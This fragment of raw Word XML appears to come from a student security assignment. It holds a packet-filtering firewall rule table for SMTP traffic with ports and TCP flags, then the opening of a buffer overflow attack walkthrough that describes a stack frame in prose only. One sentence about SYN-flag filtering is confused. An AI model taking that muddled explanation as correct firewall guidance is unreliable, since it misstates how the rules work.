          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00404BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In a packet-filtering firewall, the firewall policies define how incoming and outgoing packets are filtered and controlled. </w:t>
      </w:r>
      <w:r w:rsidR="00B32AF4" w:rsidRPr="00B32AF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The packet filtering firewall's firewall policies are made to permit or disallow traffic according to its direction, source, destination addresses, and protocol. Firewall traffic can be further restricted by modifying these policies to include source port numbers and flag options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180957E6" w14:textId="77777777" w:rsidR="00B32AF4" w:rsidRPr="00B32AF4" w:rsidRDefault="00B32AF4" w:rsidP="00B32AF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-270" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B32AF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>For instance, the policy could be modified to permit only TCP traffic with the SYN flag set coming from internal sources and going to external destinations. This would allow through only data that is actively trying to establish a connection with a different flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B63B76B" w14:textId="6F071A6C" w:rsidR="00404BB1" w:rsidRDefault="00B32AF4" w:rsidP="00B32AF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B32AF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The firewall policies can be fine-tuned by using source port numbers and flag options to permit only the traffic that is required and block any traffic that could be harmful.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00404BB1" w:rsidRPr="00404BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The initial set of policies provided can be extended to include source port numbers and flag options as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1AB96E" w14:textId="35488FD2" w:rsidR="00404BB1" w:rsidRDefault="00404BB1" w:rsidP="00397FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-270" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1038"/>
        <w:gridCol w:w="1123"/>
        <w:gridCol w:w="1039"/>
        <w:gridCol w:w="1039"/>
        <w:gridCol w:w="1039"/>
        <w:gridCol w:w="1039"/>
        <w:gridCol w:w="1039"/>
        <w:gridCol w:w="1039"/>
        <w:gridCol w:w="1039"/>
      </w:tblGrid>
      <w:tr w:rsidR="00404BB1" w14:paraId="08ECE958" w14:textId="77777777" w:rsidTr="00404BB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1038" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EDEC9B0" w14:textId="4327570D"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lastRenderedPageBreak/>
              <w:t>Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23EC4286" w14:textId="22E997F4"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Direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39C0E380" w14:textId="0AC32775"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Src add.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37E470A7" w14:textId="2F1C955E"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Dest add.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51C297A0" w14:textId="487E612A"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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="313FB09D" w14:textId="3006ADFC"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Dest port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7367488E" w14:textId="74C663AE" w:rsidR="00404BB1" w:rsidRDefault="00404BB1"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Src port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C576167" w14:textId="4053477C" w:rsidR="00404BB1" w:rsidRDefault="00B32AF4"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Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F4082F6" w14:textId="30A5F157" w:rsidR="00404BB1" w:rsidRDefault="00B32AF4"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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00404BB1" w14:paraId="75301DEE" w14:textId="77777777" w:rsidTr="00404BB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1038" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03C07D82" w14:textId="69285FE2" w:rsidR="00404BB1" w:rsidRDefault="00B32AF4"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A9BA1F9" w14:textId="2DDD968C" w:rsidR="00404BB1" w:rsidRDefault="00B32AF4"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In</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FA17459" w14:textId="51F2A0C1" w:rsidR="00404BB1" w:rsidRDefault="00B32AF4"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External</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FF93839" w14:textId="1848AB0A" w:rsidR="00404BB1" w:rsidRDefault="00B32AF4"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Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56EEBDE5" w14:textId="36A92793" w:rsidR="00404BB1" w:rsidRDefault="00B32AF4"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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FF7D635" w14:textId="08442966" w:rsidR="00404BB1" w:rsidRDefault="00B32AF4"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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01E164D5" w14:textId="3C858D8F" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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&gt;1023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EE5EDFC" w14:textId="41FE6B4C" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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SYN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15E7B5A4" w14:textId="651D0DBD" w:rsidR="00404BB1" w:rsidRDefault="00B32AF4"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Permit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00404BB1" w14:paraId="132407C1" w14:textId="77777777" w:rsidTr="00404BB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1038" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51F92CFE" w14:textId="26A507BE" w:rsidR="00404BB1" w:rsidRDefault="00B32AF4"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F3FFE17" w14:textId="5867260A" w:rsidR="00404BB1" w:rsidRDefault="00B32AF4"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Ou</w:t>
            </w:r>
            <w:r w:rsidR="004B1020">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35038ED3" w14:textId="3BC1BBDE" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="648AFFA7" w14:textId="25355FF8" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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External</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="437EA30D" w14:textId="127E9101" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C420D73" w14:textId="67387CCC" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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&gt;1023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D0AEBEA" w14:textId="31B554CF" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="670942A7" w14:textId="0BDBEE49" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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ACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="694EE7EB" w14:textId="707DBBB8" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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Permit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00404BB1" w14:paraId="43ECEA1C" w14:textId="77777777" w:rsidTr="00404BB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1038" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="684A215F" w14:textId="2297772F" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EEF246E" w14:textId="1EF38C38" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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Out</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="375597E2" w14:textId="27CA8CD0" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69B07FC2" w14:textId="63947033" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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External</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33221A55" w14:textId="12CC72FF" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E58F516" w14:textId="4ED00D9E" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75BF2E65" w14:textId="3974F600" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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&gt;1023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4263DDFD" w14:textId="0D68E6A5" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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SYN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C481226" w14:textId="3C7F0B39" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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Permit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00404BB1" w14:paraId="31492721" w14:textId="77777777" w:rsidTr="00404BB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1038" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72DE17C0" w14:textId="70DE64F8" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D4209F3" w14:textId="549CEDCB" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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In</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79848A03" w14:textId="27B44BBB" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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External</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CAF9404" w14:textId="1E282643" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26CE5245" w14:textId="0DD8EB5D" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5436DB6F" w14:textId="57C5B059" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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&gt;1023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="578D1E45" w14:textId="0331916B" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BCF1AF3" w14:textId="0728E37D" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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ACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3349CCF8" w14:textId="2EB6D3EF" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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Permit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00404BB1" w14:paraId="7F1AA173" w14:textId="77777777" w:rsidTr="00404BB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1038" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E6ED914" w14:textId="36ED4E11" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D8AC807" w14:textId="2CCAFA4E" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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Either</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3028A6BC" w14:textId="51B4A53C" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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Any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22914D3F" w14:textId="1F959364" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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Any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B4D2049" w14:textId="25F8333E" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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Any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18DC656A" w14:textId="70EECFE3" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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Any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A2B65A1" w14:textId="1D93FC50" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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Any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DE6AE53" w14:textId="6D3350D5" w:rsidR="00404BB1" w:rsidRDefault="004B1020"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25BA8204" w14:textId="38DFB6AB" w:rsidR="00404BB1" w:rsidRDefault="004B1020" w:rsidP="00397FD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Deny</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BC243A1" w14:textId="4AE5223B" w:rsidR="00404BB1" w:rsidRDefault="00404BB1" w:rsidP="00404BB1">
      <w:pPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535F21AD" w14:textId="49B2EE32" w:rsidR="00501737" w:rsidRDefault="00203369" w:rsidP="004F313F">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00203369">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>By adding the source port numbers and flag options to the firewall policies, you can further specify and control the allowed traffic based on these additional parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7068D784" w14:textId="42A72BE5" w:rsidR="00203369" w:rsidRDefault="00203369" w:rsidP="004F313F">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also add Any values for Source port and flag. </w:t>
      </w:r>
      <w:r w:rsidRPr="00203369">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The "Any" value for source port and flags means that any source port number and any TCP flag options are permitted for the specified rules. This extended policy set provides more granular control over the permitted network traffic based on specific source ports and flag configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224BC443" w14:textId="0814985C" w:rsidR="00D22D12" w:rsidRDefault="00D22D12" w:rsidP="004F313F">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1925BC3E" w14:textId="0A18C330" w:rsidR="00B83252" w:rsidRDefault="00B83252" w:rsidP="00B83252">
      <w:pPr>
        <w:ind w:left="-720" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">11.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00B83252">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Buffer Overflow Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0998D8" w14:textId="7C7FB597" w:rsidR="00530D67" w:rsidRDefault="00530D67" w:rsidP="00845C3E">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.  General Buffer overflow attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A665F6F" w14:textId="5BAA2FC1" w:rsidR="00845C3E" w:rsidRDefault="004945DB" w:rsidP="00845C3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>First, we take a normal code to see what the stack looks like. It has one function which takes three parameters and has two buffers inside it.</w:t>
      </w:r>
      <w:r w:rsidR="00D97D36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 1 shows the normal buffer overflow code.</w:t>
      </w:r>
      <w:r w:rsidR="00A51019">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this code, we attempt to bypass the assignment statement by calling a method named “function” from the main function. When the method is called, the parameters are stored on the stack along with the return address, saved frame pointer, and local variables like buffer1 and buffer2, which are also pushed onto the stack.</w:t>
      </w:r>
    </w:p>
